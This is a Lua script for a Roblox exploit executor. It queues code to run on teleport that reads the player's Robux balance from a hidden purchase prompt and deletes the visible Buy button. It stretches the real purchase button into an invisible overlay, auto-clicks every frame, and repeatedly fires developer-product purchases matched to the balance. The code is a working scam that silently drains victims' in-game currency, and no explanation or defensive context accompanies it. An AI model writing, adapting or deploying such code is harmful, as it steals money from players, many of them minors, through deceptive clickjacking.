syn.queue_on_teleport([[
    id = 12074012;
    BuyDeleted = false;
    pgp = game:GetService('ReplicatedStorage'):WaitForChild('cellphone');
    function GetRobuxAmount(NumPrice, ...)
        local CoreGui               = game.CoreGui;
        local Contents              = CoreGui.PurchasePromptApp.ProductPurchaseContainer:WaitForChild('Animator', 9999999999):WaitForChild('Prompt', 9999999999):WaitForChild('AlertContents', 999999);
        Contents.Parent.Parent.Visible = false;
        local Price                 = Contents:WaitForChild('Footer', 999999999999999):WaitForChild('FooterContent', 99999999):WaitForChild('Content', 9999999):WaitForChild('BalanceAmount', 99999999);
        local Cancel = Contents:WaitForChild('Footer', 999999999999999):WaitForChild('Buttons'):WaitForChild('1');
            local Buy = Contents:WaitForChild('Footer', 999999999999999):WaitForChild('Buttons'):WaitForChild('2');
            Buy:Destroy();
            BuyDeleted = true;
        Cancel.Parent = CoreGui.PurchasePromptApp;
        Cancel.ImageTransparency = 1;
        Cancel.Size   = UDim2.new(432143, 0, 0, 213213);
        spawn(function()
            game:GetService('RunService').RenderStepped:connect(function()
                mouse1click();
            end)
        end)
        return tonumber(Price.Text) + 1;
    end
    
        function MakePurchase()
            local CoreGui               = game.CoreGui;
            local Contentss              = CoreGui.PurchasePromptApp.ProductPurchaseContainer:WaitForChild('Animator', 9999999999):WaitForChild('Prompt', 9999999999):WaitForChild('AlertContents', 999999);
            Contentss.Parent.Parent.Visible = false;
            local Cancel = Contentss:WaitForChild('Footer', 999999999999999):WaitForChild('Buttons'):WaitForChild('2');
            Cancel.Parent = CoreGui.PurchasePromptApp;
            Cancel.ImageTransparency = 1;
            Cancel.Size   = UDim2.new(432143, 0, 0, 213213);
            return true
        end
        
        function monkeyape(id)
            lol = nil;
            repeat
                spawn(function()
                    pgp:FireServer(id);
                    MakePurchase();
                end)
                wait(0.1);
            until lol == true
        end
        
            rb = -1;
            pgp:FireServer(12074012);
            repeat
                spawn(function()
                    rb = GetRobuxAmount();
                end)
                wait(0.1);
            until rb > -1
            print(rb);
            if(rb >= 10000) then
                monkeyape(21349928);
            elseif(rb >= 5000) then
                monkeyape(21349939);
            elseif(rb >= 3000) then
                monkeyape(21349948);
            elseif(rb >= 1000) then
                monkeyape(21349957);
            elseif(rb >= 500) then
                monkeyape(21349968);
            elseif(rb >= 100) then
                monkeyape(21349974);
            elseif(rb >= 50) then
                monkeyape(21349983);
            elseif(rb >= 10) then
                monkeyape(3);
            elseif(rb >= 1) then
                monkeyape(2);
            end
]])
